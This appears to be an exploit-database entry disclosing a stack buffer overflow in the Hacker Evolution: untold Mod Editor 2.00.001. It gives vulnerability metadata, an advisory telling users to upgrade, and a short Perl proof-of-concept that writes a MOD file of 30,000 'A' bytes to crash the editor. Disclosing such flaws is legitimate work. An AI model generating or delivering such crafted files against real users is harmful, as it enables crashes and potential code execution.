header-logo
Suggest Exploit
vendor:
Hacker Evolution: untold
by:
gunslinger_
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Hacker Evolution: untold
Affected Version From: 2.00.001
Affected Version To: 2.00.001
Patch Exists: YES
Related CWE: N/A
CPE: a:exosyphen_studios:hacker_evolution:2.00.001
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

Hacker Evolution: untold Mod Editor buffer overflow

A buffer overflow vulnerability exists in Hacker Evolution: untold Mod Editor version 2.00.001. The vulnerability is caused due to a boundary error when handling specially crafted MOD files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted MOD file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Hacker Evolution: untold Mod Editor.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Title         : Hacker Evolution: untold Mod Editor buffer overflow 
# Date          : June 19, 2010
# Author        : gunslinger_ <yudha.gunslinger@gmail.com>
# Web		: http://devilzc0de.com
# Blog		: http://gunslingerc0de.wordpress.com
# Software Link : http://www.exosyphen.com/page_hacker-evolution-untold.html
# Version       : 2.00.001
# Tested on     : Windows XP SP2
# Open Hacker Evolution Mod editor -> open file -> EVIL_STAGE.MOD

my $file= "EVIL_STAGE.MOD";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "MOD File Created successfully\n";